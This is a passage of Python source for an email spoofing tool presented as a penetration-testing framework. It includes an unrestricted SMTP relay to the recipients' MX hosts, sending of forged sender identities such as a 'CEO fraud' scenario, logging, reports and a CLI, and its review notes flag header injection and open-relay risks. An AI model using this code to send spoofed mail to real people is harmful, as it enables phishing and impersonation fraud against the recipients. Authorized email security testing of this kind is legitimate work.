            "client_id": client_id,
            "total_targets": len(rcpt_to),
            "successful_deliveries": delivered,
            "email_size": len(email_data),
        }
        self._log_test_result(
            TestResult(
                timestamp=datetime.now().isoformat(),
                test_type="smtp_relay",
                scenario="server_relay",
                target=", ".join(rcpt_to),
                from_email=mail_from,
                success=any_delivered,
                details=summary,
            )
        )

        return any_delivered
408 |
def _relay_email(self, mail_from: str, rcpt_to: str, email_data: str) -> bool:
    """Relay one message to a single recipient via the recipient domain's mail hosts.

    The hosts returned by ``_get_mx_servers`` are tried in order on port 25
    with a 15 second timeout; the first host that accepts the message ends
    the loop.

    Returns:
        True once one host accepts the message. False when every host
        fails, or when an error occurs before the loop starts.

    NOTE(review): nothing in this method restricts the sender or the
    recipient, so whoever can reach the listener decides where mail is
    sent. Keep the listener on an isolated test network and limit
    recipients to the agreed engagement scope.
    """
    try:
        # An address without "@" raises IndexError here; the outer handler
        # logs it and returns False.
        domain = rcpt_to.split('@')[1]
        mx_servers = self._get_mx_servers(domain)

        self.config.logger.info(f"Attempting relay to {rcpt_to} via {len(mx_servers)} MX servers")

        for mx_server in mx_servers:
            try:
                # NOTE(review): if sendmail() raises, quit() below is skipped
                # and this connection is never explicitly closed.
                server = smtplib.SMTP(mx_server, 25, timeout=15)
                server.set_debuglevel(0)

                # Ensure proper encoding
                # From/To lines are prepended to whatever the client sent; if
                # email_data already starts with its own headers the message
                # ends up carrying both sets.
                full_email = f"From: {mail_from}\r\nTo: {rcpt_to}\r\n{email_data}"
                full_email_bytes = full_email.encode('utf-8')
                server.sendmail(mail_from, [rcpt_to], full_email_bytes)
                server.quit()

                # "delivered" means the remote host accepted the message at
                # SMTP level; later filtering or quarantine is not visible here.
                self.config.logger.info(f"✅ Email delivered to {rcpt_to} via {mx_server}")
                return True

            except Exception as e:
                # Only the first 60 characters of the error are logged.
                self.config.logger.warning(f"❌ Relay failed via {mx_server}: {str(e)[:60]}...")
                continue

        self.config.logger.error(f"❌ All relay attempts failed for {rcpt_to}")
        return False

    except Exception as e:
        self.config.logger.error(f"❌ Relay error for {rcpt_to}: {e}")
        return False
441 |
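def _get_mx_servers(self, domain: str) -> List[str]:
    """Return candidate mail hosts for ``domain``, lowest MX preference first.

    MX records are looked up with dnspython when it can be imported. If the
    import or the lookup fails, the conventional names ``mail.``, ``mx.``
    and ``mx1.`` under the domain are probed and the ones that resolve are
    returned instead.

    Args:
        domain: Domain part of the recipient address.

    Returns:
        Host names to try, possibly an empty list.
    """
    try:
        import dns.resolver
        mx_records = dns.resolver.resolve(domain, 'MX')
        servers = [str(mx.exchange).rstrip('.') for mx in sorted(mx_records, key=lambda x: x.preference)]
        # A "null MX" (exchange ".") becomes an empty string after rstrip;
        # it announces that the domain accepts no mail, so it is not a host.
        servers = [host for host in servers if host]
        self.config.logger.debug(f"Found MX servers for {domain}: {servers}")
        return servers
    except ImportError:
        self.config.logger.warning("DNS library not available, using fallbacks")
    except Exception as e:
        self.config.logger.warning(f"DNS lookup failed for {domain}: {e}")

    # Fallback servers
    fallbacks = [f"mail.{domain}", f"mx.{domain}", f"mx1.{domain}"]
    working_fallbacks = []

    for mx in fallbacks:
        try:
            socket.gethostbyname(mx)
        except (OSError, UnicodeError):
            # OSError covers resolution failures, UnicodeError a name that
            # cannot be IDNA-encoded. A bare except would also swallow
            # KeyboardInterrupt and SystemExit.
            continue
        working_fallbacks.append(mx)

    return working_fallbacks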
467 |
def _log_test_result(self, result: TestResult):
    """Append ``result`` to the configured log file as one JSON line.

    Any failure is reported through the logger and never raised to the
    caller.
    """
    field_names = (
        "timestamp",
        "test_type",
        "scenario",
        "target",
        "from_email",
        "success",
        "details",
    )
    try:
        log_entry = {name: getattr(result, name) for name in field_names}

        with open(self.config.log_file, 'a') as log_handle:
            log_handle.write(json.dumps(log_entry) + '\n')

    except Exception as e:
        self.config.logger.error(f"Failed to log test result: {e}")
486 |
487 | class EST:
488 | """Main EST application class"""
489 |
def __init__(self):
    """Load the configuration and build the scenario list from it."""
    self.config = ESTConfig()
    scenario_specs = self.config.config['scenarios']
    self.scenarios = [EmailScenario(**spec) for spec in scenario_specs]
493 |
def print_banner(self):
    """Print the tool banner followed by the authorized-use legal notice."""
    # __version__, __author__ and __license__ are module-level names
    # interpolated into the box below.
    banner = f"""
╔══════════════════════════════════════════════════════════════╗
║ EST - Email Spoofing Tool ║
║ Professional Security Assessment v{__version__} ║
║ ║
║ Advanced Email Security Testing Framework ║
║ For Authorized Penetration Testing Only ║
║ Educational & Research Purposes ║
║ ║
║ Author: {__author__} ║
║ License: {__license__} ║
╚══════════════════════════════════════════════════════════════╝

⚠️ LEGAL NOTICE: This tool is for authorized security testing only.
Obtain explicit written permission before testing any systems.
Unauthorized use may violate applicable laws and regulations.
"""
    print(banner)
514 |
def list_scenarios(self):
    """Print every configured scenario, grouped by category.

    Scenarios keep their 1-based position in ``self.scenarios`` as their
    number. Categories appear in the order they are first seen.
    """
    print("\n📋 Available Email Spoofing Scenarios:\n")

    severity_icons = {
        "Critical": "🔴",
        "High": "🟠",
        "Medium": "🟡",
        "Low": "🟢",
    }

    grouped = {}
    for number, item in enumerate(self.scenarios, 1):
        grouped.setdefault(item.category, []).append((number, item))

    for heading, members in grouped.items():
        print(f"🏷️ {heading}")
        print("─" * (len(heading) + 5))

        for number, item in members:
            # Unknown severities fall back to the neutral marker.
            marker = severity_icons.get(item.severity, "⚪")

            print(f" {number:2d}. {item.name} {marker}")
            print(f" From: {item.from_name} <{item.from_email}>")
            print(f" Subject: {item.subject}")
            print(f" Description: {item.description}")
            print()

    print(f"📊 Total scenarios: {len(self.scenarios)}")
    print(f"🎯 Use 'est test ' to run a scenario")
545 |
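def run_scenario(self, scenario_id: int, target: str, smtp_host: str = "localhost", smtp_port: int = 2525) -> bool:
    """Send one predefined scenario to ``target`` through the given SMTP server.

    Args:
        scenario_id: 1-based position of the scenario in ``self.scenarios``.
        target: Recipient address.
        smtp_host: SMTP server the message is submitted to.
        smtp_port: Port of that server.

    Returns:
        True when the SMTP server accepted the message. False for an
        out-of-range ``scenario_id`` or for any error while building or
        sending the message. Acceptance by the server is all that is
        measured; it does not show whether the message reached an inbox or
        passed SPF/DKIM/DMARC checks on the receiving side.
    """
    # Explicit range check: a plain index lookup lets 0 and negative IDs wrap
    # around to the end of the list and run a scenario nobody asked for.
    if not 1 <= scenario_id <= len(self.scenarios):
        print(f"❌ Invalid scenario ID: {scenario_id}")
        print(f"💡 Available scenarios: 1-{len(self.scenarios)}")
        return False
    scenario = self.scenarios[scenario_id - 1]

    smtp_endpoint = f"{smtp_host}:{smtp_port}"

    print(f"\n🎯 Executing Email Spoofing Test")
    print(f"─" * 40)
    print(f"📧 Scenario: {scenario.name}")
    print(f"🏷️ Category: {scenario.category}")
    print(f"⚠️ Severity: {scenario.severity}")
    print(f"📤 Spoofed From: {scenario.from_name} <{scenario.from_email}>")
    print(f"📥 Target: {target}")
    print(f"📡 SMTP Server: {smtp_endpoint}")
    print(f"🕐 Timestamp: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    print()

    try:
        # Create professional email content using MIME
        email_content = self._create_mime_email(scenario, target)

        # Send via SMTP
        print("🚀 Initiating SMTP connection...")
        server = smtplib.SMTP(smtp_host, smtp_port, timeout=30)
        try:
            print("📤 Sending spoofed email...")
            server.sendmail(scenario.from_email, [target], email_content)
            server.quit()
        finally:
            # Release the socket even when sendmail() raised; close() after
            # a successful quit() is a no-op.
            server.close()

        print("✅ Email spoofing test completed successfully!")
        print(f"📋 Check target inbox: {target}")

        # Log the test
        result = TestResult(
            timestamp=datetime.now().isoformat(),
            test_type="scenario_test",
            scenario=scenario.name,
            target=target,
            from_email=scenario.from_email,
            success=True,
            details={
                "category": scenario.category,
                "severity": scenario.severity,
                "smtp_server": smtp_endpoint
            }
        )

        self._log_test_result(result)
        return True

    except Exception as e:
        print(f"❌ Email spoofing test failed: {e}")
        print(f"💡 Verify SMTP server is running: est server --port {smtp_port}")

        # Log failed test
        result = TestResult(
            timestamp=datetime.now().isoformat(),
            test_type="scenario_test",
            scenario=scenario.name,
            target=target,
            from_email=scenario.from_email,
            success=False,
            details={
                "error": str(e),
                "smtp_server": smtp_endpoint
            }
        )

        self._log_test_result(result)
        return False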
619 |
def run_custom_test(self, from_email: str, from_name: str, subject: str,
                    body: str, target: str, smtp_host: str = "localhost",
                    smtp_port: int = 2525) -> bool:
    """Send one operator-defined test message to ``target``.

    The message is built by ``_create_custom_mime_email`` and submitted to
    ``smtp_host:smtp_port``. The outcome is written to the test log either
    way.

    Returns:
        True when the SMTP server accepted the message, False on any error
        while building or sending it.
    """
    smtp_endpoint = f"{smtp_host}:{smtp_port}"

    print(f"\n🎯 Executing Custom Email Spoofing Test")
    print(f"─" * 45)
    print(f"📤 Spoofed From: {from_name} <{from_email}>")
    print(f"📥 Target: {target}")
    print(f"📋 Subject: {subject}")
    print(f"📡 SMTP Server: {smtp_endpoint}")
    print(f"🕐 Timestamp: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    print()

    try:
        # Create MIME email with proper encoding
        message_text = self._create_custom_mime_email(from_email, from_name, subject, body, target)

        print("🚀 Initiating SMTP connection...")
        connection = smtplib.SMTP(smtp_host, smtp_port, timeout=30)

        print("📤 Sending custom spoofed email...")
        connection.sendmail(from_email, [target], message_text)
        connection.quit()

        print("✅ Custom email spoofing test completed successfully!")
        print(f"📋 Check target inbox: {target}")

        # Log the test
        success_details = {
            "from_name": from_name,
            "subject": subject,
            "body_length": len(body),
            "smtp_server": smtp_endpoint
        }
        self._log_test_result(TestResult(
            timestamp=datetime.now().isoformat(),
            test_type="custom_test",
            scenario="custom",
            target=target,
            from_email=from_email,
            success=True,
            details=success_details
        ))
        return True

    except Exception as e:
        print(f"❌ Custom email spoofing test failed: {e}")

        # Log failed test
        failure_details = {
            "error": str(e),
            "smtp_server": smtp_endpoint
        }
        self._log_test_result(TestResult(
            timestamp=datetime.now().isoformat(),
            test_type="custom_test",
            scenario="custom",
            target=target,
            from_email=from_email,
            success=False,
            details=failure_details
        ))
        return False
685 |
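def show_logs(self, lines: int = 20):
    """Print the most recent entries of the JSON-lines test log.

    Args:
        lines: Maximum number of entries to show, counted from the end of
            the file. Zero or a negative number shows no entries.

    Lines that are not valid JSON, or that lack an expected field, are
    skipped so that one damaged record does not hide the rest.
    """
    if not self.config.log_file.exists():
        print("📝 No test logs found")
        print(f"💡 Run some tests first, then check: {self.config.log_file}")
        return

    def _printable(value):
        # Log fields such as the sender address can originate from SMTP
        # clients of the relay server, so control characters (terminal
        # escape sequences included) are replaced before printing.
        return "".join(ch if ch.isprintable() else "?" for ch in str(value))

    print(f"\n📊 EST Security Test Logs (Last {lines} entries)")
    print("═" * 80)

    try:
        with open(self.config.log_file, 'r') as f:
            log_lines = f.readlines()

        # log_lines[-0:] would return the whole file and a negative count
        # would drop entries from the front, so both mean "show nothing".
        recent_logs = log_lines[-lines:] if lines > 0 else []

        for line in recent_logs:
            # Read every field before printing so a damaged record produces
            # no partial output.
            try:
                entry = json.loads(line.strip())
                timestamp = entry['timestamp'][:19].replace('T', ' ')
                status = "✅ SUCCESS" if entry['success'] else "❌ FAILED"
                test_type = entry['test_type'].replace('_', ' ').title()
                scenario = entry['scenario']
                from_email = entry['from_email']
                target = entry['target']
                details = entry.get('details')
            except (json.JSONDecodeError, KeyError, TypeError, AttributeError):
                continue

            if not isinstance(details, dict):
                details = {}

            print(f"📅 {_printable(timestamp)} | {status}")
            print(f"🎯 Test: {_printable(test_type)} - {_printable(scenario)}")
            print(f"📤 From: {_printable(from_email)}")
            print(f"📥 Target: {_printable(target)}")

            if 'category' in details:
                print(f"🏷️ Category: {_printable(details['category'])}")
            if 'severity' in details:
                print(f"⚠️ Severity: {_printable(details['severity'])}")
            if 'error' in details:
                print(f"❌ Error: {_printable(details['error'])}")

            print("─" * 80)

        print(f"📈 Total log entries: {len(log_lines)}")
        print(f"📁 Full log file: {self.config.log_file}")

    except Exception as e:
        print(f"❌ Error reading logs: {e}")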
734 |
def generate_report(self, output_file: Optional[str] = None):
    """Build a JSON report from the test log and print a short summary.

    Args:
        output_file: Where to write the report. When omitted, a timestamped
            file name inside ``self.config.reports_dir`` is used.

    Any error while reading, building or writing is printed and not
    raised.
    """
    if not self.config.log_file.exists():
        print("❌ No test data available for report generation")
        return

    print("📊 Generating EST Security Assessment Report...")

    try:
        # Read all log entries, ignoring blank lines
        log_entries = []
        with open(self.config.log_file, 'r') as log_handle:
            for raw_line in log_handle:
                if raw_line.strip():
                    log_entries.append(json.loads(raw_line.strip()))

        if not log_entries:
            print("❌ No test data found in logs")
            return

        # Generate report
        report = self._create_report(log_entries)

        # Save report
        if not output_file:
            stamp = datetime.now().strftime("%Y%m%d_%H%M%S")
            output_file = self.config.reports_dir / f"est_report_{stamp}.json"

        with open(output_file, 'w') as report_handle:
            json.dump(report, report_handle, indent=2)

        print(f"✅ Report generated: {output_file}")
        self._print_report_summary(report)

    except Exception as e:
        print(f"❌ Report generation failed: {e}")
768 |
def _create_report(self, log_entries: List[Dict]) -> Dict:
    """Aggregate log entries into the report dictionary.

    The result holds report metadata, overall counts with the success
    rate, per-test-type and per-scenario tallies, the raw entries, and the
    list returned by ``_generate_recommendations``.
    """
    def tally(field):
        # One {'total', 'success'} counter per distinct value of ``field``.
        counts = {}
        for record in log_entries:
            bucket = counts.setdefault(record[field], {'total': 0, 'success': 0})
            bucket['total'] += 1
            if record['success']:
                bucket['success'] += 1
        return counts

    total_tests = len(log_entries)
    successful_tests = len([record for record in log_entries if record['success']])
    failed_tests = total_tests - successful_tests

    # Analyze by test type, then by scenario
    by_test_type = tally('test_type')
    by_scenario = tally('scenario')

    # Time analysis: ISO timestamps are compared as strings
    stamps = [record['timestamp'] for record in log_entries]
    if stamps:
        first_test, last_test = min(stamps), max(stamps)
    else:
        first_test = last_test = None

    if total_tests > 0:
        success_rate = round((successful_tests / total_tests * 100), 2)
    else:
        success_rate = 0

    return {
        "report_metadata": {
            "generated_at": datetime.now().isoformat(),
            "tool_version": __version__,
            "report_type": "EST Security Assessment",
            "total_tests": total_tests
        },
        "executive_summary": {
            "total_tests_conducted": total_tests,
            "successful_tests": successful_tests,
            "failed_tests": failed_tests,
            "success_rate": success_rate,
            "test_period": {
                "first_test": first_test,
                "last_test": last_test
            }
        },
        "test_analysis": {
            "by_test_type": by_test_type,
            "by_scenario": by_scenario
        },
        "detailed_logs": log_entries,
        "recommendations": self._generate_recommendations(log_entries)
    }
824 |
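def _generate_recommendations(self, log_entries: List[Dict]) -> List[str]:
    """Build the recommendation list for a report from the logged results.

    The headline depends on the share of entries whose ``success`` field is
    true: above 80 % critical, above 50 % high, otherwise medium. When no
    entry succeeded the headline says so instead of reporting successful
    spoofing that the data does not show.

    Args:
        log_entries: Parsed log records; only ``success`` is read.

    Returns:
        Four severity-specific lines followed by four general ones.

    NOTE(review): judging by the code that writes these records, "success"
    means the message was accepted at SMTP level. Read the rate as an upper
    bound on what actually reached a mailbox.
    """
    recommendations = []

    successful_tests = sum(1 for entry in log_entries if entry['success'])
    total_tests = len(log_entries)
    success_rate = (successful_tests / total_tests * 100) if total_tests > 0 else 0

    if success_rate > 80:
        recommendations.extend([
            "🔴 CRITICAL: High email spoofing success rate detected",
            "Implement SPF, DKIM, and DMARC email authentication",
            "Configure email security gateways with spoofing detection",
            "Conduct immediate security awareness training"
        ])
    elif success_rate > 50:
        recommendations.extend([
            "🟠 HIGH: Moderate spoofing vulnerabilities identified",
            "Review and strengthen email authentication policies",
            "Implement additional email security controls",
            "Regular security awareness training recommended"
        ])
    else:
        if successful_tests > 0:
            headline = "🟡 MEDIUM: Some spoofing attempts successful"
        else:
            # Nothing succeeded: do not claim findings the log does not hold.
            headline = "🟢 LOW: No spoofing attempts succeeded in the recorded tests"
        recommendations.extend([
            headline,
            "Continue monitoring email security controls",
            "Periodic security awareness refresher training",
            "Regular testing of email authentication mechanisms"
        ])

    recommendations.extend([
        "📚 Provide targeted training on identifying spoofed emails",
        "🔍 Implement email header analysis training",
        "⚡ Establish incident response procedures for email attacks",
        "📊 Regular penetration testing of email security controls"
    ])

    return recommendations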
863 |
def _print_report_summary(self, report: Dict):
    """Print the headline numbers, a risk level and the first three recommendations."""
    summary = report['executive_summary']
    rate = summary['success_rate']
    recommendations = report['recommendations']
    shown = 3

    print(f"\n📋 EST Security Assessment Summary")
    print("═" * 50)
    print(f"📊 Total Tests: {summary['total_tests_conducted']}")
    print(f"✅ Successful: {summary['successful_tests']}")
    print(f"❌ Failed: {summary['failed_tests']}")
    print(f"📈 Success Rate: {rate}%")

    # Same thresholds as the recommendation headline: >80 critical, >50 high.
    if rate > 80:
        risk_line = "🔴 Risk Level: CRITICAL - Immediate action required"
    elif rate > 50:
        risk_line = "🟠 Risk Level: HIGH - Remediation recommended"
    else:
        risk_line = "🟡 Risk Level: MEDIUM - Monitoring advised"
    print(risk_line)

    print(f"\n📚 Recommendations: {len(recommendations)} items")
    for rec in recommendations[:shown]:
        print(f" • {rec}")
    remaining = len(recommendations) - shown
    if remaining > 0:
        print(f" ... and {remaining} more")
887 |
def _create_mime_email(self, scenario: EmailScenario, target: str) -> str:
    """Build the scenario message as a MIME document and return it as a string.

    The body is the scenario text followed by a footer that identifies the
    message as an EST security test and lists the scenario details.

    Returns:
        The serialized message, or the output of ``_create_simple_email``
        when anything in the MIME path raises.
    """
    try:
        # Create MIME message
        msg = MIMEMultipart('alternative')

        # Set headers with proper encoding
        msg['From'] = f"{scenario.from_name} <{scenario.from_email}>"
        msg['To'] = target
        msg['Subject'] = Header(scenario.subject, 'utf-8')
        msg['Date'] = formatdate(localtime=True)
        # A from_email without "@" raises IndexError here and triggers the fallback.
        msg['Message-ID'] = email.utils.make_msgid(domain=scenario.from_email.split('@')[1])

        # Create email body with disclaimer
        email_body = f"""{scenario.body}

────────────────────────────────────────────────────────────────
This email was sent using EST (Email Spoofing Tool) for authorized
security testing purposes. If you received this email unexpectedly,
please contact your IT security team immediately.

Test Details:
• Scenario: {scenario.name}
• Category: {scenario.category}
• Severity: {scenario.severity}
• Timestamp: {datetime.now().isoformat()}

EST v{__version__} - Professional Email Security Assessment Framework
────────────────────────────────────────────────────────────────"""

        # Create text part with proper encoding
        text_part = MIMEText(email_body, 'plain', 'utf-8')
        msg.attach(text_part)

        return msg.as_string()

    except Exception as e:
        self.config.logger.error(f"MIME email creation failed: {e}")
        # Fallback to simple string method
        # NOTE(review): every failure lands here, presumably including the
        # email package rejecting a header value with an embedded newline.
        # The fallback formats headers with plain string interpolation and
        # has no such check; consider failing closed instead. TODO confirm.
        return self._create_simple_email(scenario, target)
928 |
def _create_custom_mime_email(self, from_email: str, from_name: str, subject: str, body: str, target: str) -> str:
    """Build an operator-defined message as a MIME document and return it as a string.

    The body is the supplied text followed by a footer that identifies the
    message as an EST security test.

    Returns:
        The serialized message, or the output of
        ``_create_simple_custom_email`` when anything in the MIME path
        raises.
    """
    try:
        # Create MIME message
        msg = MIMEMultipart('alternative')

        # Set headers with proper encoding
        msg['From'] = f"{from_name} <{from_email}>"
        msg['To'] = target
        msg['Subject'] = Header(subject, 'utf-8')
        msg['Date'] = formatdate(localtime=True)
        # A from_email without "@" raises IndexError here and triggers the fallback.
        msg['Message-ID'] = email.utils.make_msgid(domain=from_email.split('@')[1])

        # Create email body with disclaimer
        email_body = f"""{body}

────────────────────────────────────────────────────────────────
This email was sent using EST (Email Spoofing Tool) for authorized
security testing purposes. If you received this email unexpectedly,
please contact your IT security team immediately.

EST v{__version__} - Professional Email Security Assessment Framework
────────────────────────────────────────────────────────────────"""

        # Create text part with proper encoding
        text_part = MIMEText(email_body, 'plain', 'utf-8')
        msg.attach(text_part)

        return msg.as_string()

    except Exception as e:
        self.config.logger.error(f"Custom MIME email creation failed: {e}")
        # Fallback to simple string method
        # NOTE(review): every failure lands here, presumably including the
        # email package rejecting a header value with an embedded newline.
        # The fallback formats headers with plain string interpolation and
        # has no such check; consider failing closed instead. TODO confirm.
        return self._create_simple_custom_email(from_email, from_name, subject, body, target)
963 |
def _create_simple_email(self, scenario: EmailScenario, target: str) -> str:
    """Format the scenario message with plain string interpolation (fallback path).

    Produces the headers, the scenario body and the EST test footer as one
    string, without using the email package.

    NOTE(review): field values are inserted as given, so a CR or LF inside
    a name, address or subject changes the header block; validate the
    fields before formatting. ``datetime.now()`` is naive, so ``%z``
    renders empty and the Date header has no UTC offset. ``hash()`` of a
    str is salted per process, so the Message-ID suffix is not reproducible
    between runs.
    """
    return f"""From: {scenario.from_name} <{scenario.from_email}>
To: {target}
Subject: {scenario.subject}
Date: {datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z')}
Message-ID: <{int(time.time())}.{hash(target) % 10000}@{scenario.from_email.split('@')[1]}>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

{scenario.body}

────────────────────────────────────────────────────────────────
This email was sent using EST (Email Spoofing Tool) for authorized
security testing purposes. If you received this email unexpectedly,
please contact your IT security team immediately.

Test Details:
• Scenario: {scenario.name}
• Category: {scenario.category}
• Severity: {scenario.severity}
• Timestamp: {datetime.now().isoformat()}

EST v{__version__} - Professional Email Security Assessment Framework
────────────────────────────────────────────────────────────────
"""
990 |
def _create_simple_custom_email(self, from_email: str, from_name: str, subject: str, body: str, target: str) -> str:
    """Format an operator-defined message with plain string interpolation (fallback path).

    Produces the headers, the supplied body and the EST test footer as one
    string, without using the email package.

    NOTE(review): field values are inserted as given, so a CR or LF inside
    a name, address or subject changes the header block; validate the
    fields before formatting. ``datetime.now()`` is naive, so ``%z``
    renders empty and the Date header has no UTC offset. ``hash()`` of a
    str is salted per process, so the Message-ID suffix is not reproducible
    between runs.
    """
    return f"""From: {from_name} <{from_email}>
To: {target}
Subject: {subject}
Date: {datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z')}
Message-ID: <{int(time.time())}.{hash(target) % 10000}@{from_email.split('@')[1]}>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

{body}

────────────────────────────────────────────────────────────────
This email was sent using EST (Email Spoofing Tool) for authorized
security testing purposes. If you received this email unexpectedly,
please contact your IT security team immediately.

EST v{__version__} - Professional Email Security Assessment Framework
────────────────────────────────────────────────────────────────
"""
1011 |
def _log_test_result(self, result: TestResult):
    """Append ``result`` to the log file as one JSON line and note it in the logger.

    Any failure is reported through the logger and never raised to the
    caller.
    """
    field_names = (
        "timestamp",
        "test_type",
        "scenario",
        "target",
        "from_email",
        "success",
        "details",
    )
    try:
        log_entry = {name: getattr(result, name) for name in field_names}

        with open(self.config.log_file, 'a') as log_handle:
            log_handle.write(json.dumps(log_entry) + '\n')

        self.config.logger.info(f"Test logged: {result.test_type} - {result.scenario}")

    except Exception as e:
        self.config.logger.error(f"Failed to log test result: {e}")
1032 |
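def main():
    """Parse the command line and dispatch to the selected EST command.

    Commands: ``server``, ``list``, ``test``, ``custom``, ``logs`` and
    ``report``. With no command, the banner and the help text are printed.
    ``test`` and ``custom`` exit with status 0 on success and 1 on failure;
    ``server`` exits with status 1 when a privileged port is requested
    without root privileges.
    """
    parser = argparse.ArgumentParser(
        prog='est',
        description='EST - Professional Email Spoofing Tool for Security Assessment',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=f"""
Examples:
est server --port 2525 Start SMTP testing server
est list List available spoofing scenarios
est test 1 target@company.com Run CEO fraud scenario
est custom --from-email "ceo@company.com" \\
--from-name "John Smith" \\
--subject "Urgent Request" \\
--body "Please handle this" \\
--target "user@company.com" Run custom spoofing test
est logs --lines 50 View recent test logs
est report Generate assessment report

EST v{__version__} - Professional Email Security Assessment Framework
Author: {__author__} | License: {__license__}

⚠️ LEGAL NOTICE: For authorized security testing only.
Obtain explicit written permission before testing any systems.
"""
    )

    parser.add_argument('--version', action='version', version=f'EST v{__version__}')

    subparsers = parser.add_subparsers(dest='command', help='Available commands')

    # Server command
    # NOTE(review): the default listens on every interface, and the relay
    # code in this file places no restriction on who may submit mail or to
    # whom. Prefer --host 127.0.0.1 or an isolated lab interface.
    server_parser = subparsers.add_parser('server', help='Start SMTP testing server')
    server_parser.add_argument('--host', default='0.0.0.0',
                               help='Host to bind to (default: 0.0.0.0)')
    server_parser.add_argument('--port', type=int, default=2525,
                               help='Port to bind to (default: 2525)')

    # List command
    subparsers.add_parser('list', help='List available spoofing scenarios')

    # Test command
    test_parser = subparsers.add_parser('test', help='Run spoofing scenario')
    test_parser.add_argument('scenario', type=int,
                             help='Scenario ID (use "list" to see available)')
    test_parser.add_argument('target', help='Target email address')
    test_parser.add_argument('--smtp-host', default='localhost',
                             help='SMTP server hostname (default: localhost)')
    test_parser.add_argument('--smtp-port', type=int, default=2525,
                             help='SMTP server port (default: 2525)')

    # Custom test command
    custom_parser = subparsers.add_parser('custom', help='Run custom spoofing test')
    custom_parser.add_argument('--from-email', required=True,
                               help='Spoofed sender email address')
    custom_parser.add_argument('--from-name', required=True,
                               help='Spoofed sender display name')
    custom_parser.add_argument('--subject', required=True,
                               help='Email subject line')
    custom_parser.add_argument('--body', required=True,
                               help='Email body content')
    custom_parser.add_argument('--target', required=True,
                               help='Target email address')
    custom_parser.add_argument('--smtp-host', default='localhost',
                               help='SMTP server hostname (default: localhost)')
    custom_parser.add_argument('--smtp-port', type=int, default=2525,
                               help='SMTP server port (default: 2525)')

    # Logs command
    logs_parser = subparsers.add_parser('logs', help='View test logs')
    logs_parser.add_argument('--lines', type=int, default=20,
                             help='Number of recent log entries to display (default: 20)')

    # Report command
    report_parser = subparsers.add_parser('report', help='Generate assessment report')
    report_parser.add_argument('--output', help='Output file path (default: auto-generated)')

    args = parser.parse_args()

    # Initialize EST
    est = EST()

    # Handle commands
    if not args.command:
        est.print_banner()
        parser.print_help()
        return

    if args.command == 'server':
        # Check port permissions. Privileged ports are 0-1023, so 1024 itself
        # needs no root. os.geteuid() exists only on Unix; elsewhere the
        # check is skipped rather than raising AttributeError.
        if args.port < 1024 and hasattr(os, 'geteuid') and os.geteuid() != 0:
            print(f"❌ Port {args.port} requires root privileges!")
            print(f"💡 Solutions:")
            print(f" 1. Run as root: sudo est server --port {args.port}")
            print(f" 2. Use unprivileged port: est server --port 2525")
            sys.exit(1)

        server = SMTPTestServer(args.host, args.port, est.config)
        try:
            server.start()
        except KeyboardInterrupt:
            # Ctrl+C is the normal way to stop the server.
            pass

    elif args.command == 'list':
        est.print_banner()
        est.list_scenarios()

    elif args.command == 'test':
        est.print_banner()
        success = est.run_scenario(args.scenario, args.target, args.smtp_host, args.smtp_port)
        sys.exit(0 if success else 1)

    elif args.command == 'custom':
        est.print_banner()
        success = est.run_custom_test(
            args.from_email, args.from_name, args.subject,
            args.body, args.target, args.smtp_host, args.smtp_port
        )
        sys.exit(0 if success else 1)

    elif args.command == 'logs':
        est.print_banner()
        est.show_logs(args.lines)

    elif args.command == 'report':
        est.print_banner()
        est.generate_report(args.output)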
# Run the command-line interface only when the file is executed as a script.
if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------